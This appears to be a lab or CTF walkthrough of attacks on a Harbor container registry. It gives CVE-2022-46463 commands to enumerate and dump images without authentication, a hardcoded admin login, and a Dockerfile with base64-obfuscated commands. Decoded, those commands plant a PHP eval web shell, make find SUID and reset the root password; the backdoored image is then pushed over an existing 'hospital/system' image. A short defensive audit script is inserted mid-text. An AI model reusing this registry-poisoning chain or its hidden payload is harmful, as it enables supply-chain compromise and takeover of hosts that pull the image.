Harbor

Harbor is an open-source cloud-native artifact registry (Cloud Native Repository), used mainly to store and manage container-related artifacts such as Docker images and Helm charts.
https://github.com/goharbor/harbor

1. Harbor unauthorized access

git clone https://github.com/404tk/CVE-2022-46463

#Detect public images that are accessible without authentication
┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal


#Download an image
┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/ --dump harbor/secret --v2

The image can also be pulled with docker:

#(optional) add a docker proxy in /etc/systemd/system/docker.service.d/http-proxy.conf
[Service]
# proxy address is host:port
Environment="HTTP_PROXY=socks5://124.71.111.64:1188"

#docker login (required for pulling private images)
docker login 172.22.18.64 -u admin -p password@nk9DLwqce

#Edit /etc/docker/daemon.json (required for a registry without a trusted TLS certificate)
{
  "insecure-registries": ["172.22.18.64"]
}

#Restart docker
systemctl daemon-reload
systemctl restart docker

#Pull the image
docker pull 172.22.18.64/public/mysql:5.6

#Run the image
docker run -itd 172.22.18.64/public/mysql:5.6
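The check above relies on Harbor exposing its project list anonymously, so an administrator can turn the same observation into an audit of their own registry. The following is an added example, not part of the original note or of the CVE-2022-46463 tool; it assumes the Harbor v2.0 REST API path /api/v2.0/projects with page/page_size pagination and the project metadata keys public, enable_content_trust and prevent_vul.

```python
import json
import urllib.request
from urllib.parse import urlencode

# Harbor's v2.0 API lists projects at /api/v2.0/projects and paginates with
# page/page_size. Anonymous callers only see projects whose metadata has
# public == "true"; those are exactly the projects that can be pulled without
# credentials, which is what the unauthenticated-access check relies on.
API_PATH = "/api/v2.0/projects"  # assumed Harbor API path


def fetch_projects(base_url, page_size=100):
    """Page through the project list anonymously (no Authorization header)."""
    projects, page = [], 1
    while True:
        query = urlencode({"page": page, "page_size": page_size})
        url = f"{base_url.rstrip('/')}{API_PATH}?{query}"
        with urllib.request.urlopen(url, timeout=10) as resp:
            batch = json.load(resp)
        projects.extend(batch)
        if len(batch) < page_size:
            return projects
        page += 1


def audit_projects(projects):
    """Return one finding per project that is anonymously pullable or that
    skips Harbor's pull-time controls (metadata key names are assumptions)."""
    findings = []
    for proj in projects:
        meta = proj.get("metadata", {})
        issues = []
        if meta.get("public") == "true":
            issues.append("anonymous pull allowed (public project)")
        if meta.get("enable_content_trust") != "true":
            issues.append("content trust not enforced")
        if meta.get("prevent_vul") != "true":
            issues.append("vulnerable images not blocked from pull")
        if issues:
            findings.append({"project": proj["name"], "issues": issues})
    return findings


# Constructed sample in the shape Harbor returns; not captured from a real host.
SAMPLE_PROJECTS = [
    {"name": "library", "metadata": {"public": "true", "enable_content_trust": "false", "prevent_vul": "false"}},
    {"name": "hospital", "metadata": {"public": "false", "enable_content_trust": "true", "prevent_vul": "true"}},
]

if __name__ == "__main__":
    for finding in audit_projects(SAMPLE_PROJECTS):
        print(finding["project"], "->", "; ".join(finding["issues"]))
```

Run it against a real instance with audit_projects(fetch_projects("https://harbor.example.internal")); any project listed under "anonymous pull allowed" is readable by anyone who can reach the registry.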

2. Push a malicious image to Harbor

#docker login
docker login 172.22.18.64 -u admin -p password@nk9DLwqce

#Edit /etc/docker/daemon.json
{
  "insecure-registries": ["172.22.18.64"]
}

Write the malicious Dockerfile:

FROM 172.22.18.64/hospital/system@sha256:8a280a0432a365e1cd830e84961a7dda9faf11b5fde2fe79edb9a99b581e793b

RUN echo "ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+JyA+IC92YXIvd3d3L2h0bWwvc2hlbGwucGhwICYmIGNobW9kIHUrcyAvdXNyL2Jpbi9maW5k" | base64 -d | bash && \
    echo "ZWNobyAicm9vdDpwYXNzd29yZCIgfCBjaHBhc3N3ZA==" | base64 -d | bash

ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"]

#Build the malicious image
docker build -t 172.22.18.64/hospital/system .

#Push the malicious image
docker push 172.22.18.64/hospital/system